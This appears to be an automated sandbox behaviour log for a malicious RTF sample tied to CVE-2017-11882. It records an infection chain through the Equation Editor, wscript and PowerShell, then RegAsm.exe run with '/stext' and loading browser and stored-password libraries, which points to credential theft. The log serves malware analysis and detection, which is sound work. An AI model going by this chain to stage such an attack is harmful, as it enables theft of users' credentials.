Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rtrfuoyfiupqcguozzwaq"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\towqvgihwchvemqsikjctbjd"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\towqvgihwchvemqsikjctbjd"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64win.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64cpu.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: msi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rpcrtremote.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dwmapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: version.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: secur32.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winhttp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: webio.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: iphlpapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winnsi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dnsapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: nlaapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rasadhlp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: propsys.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: ntmarta.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: webio.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: credssp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: samcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msacm32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: shcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: bcrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: nlaapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: samcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msacm32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: atl.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: samcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msacm32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: pstorec.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: atl.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: samcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msacm32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ucrtbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64win.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64cpu.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: msi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rpcrtremote.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
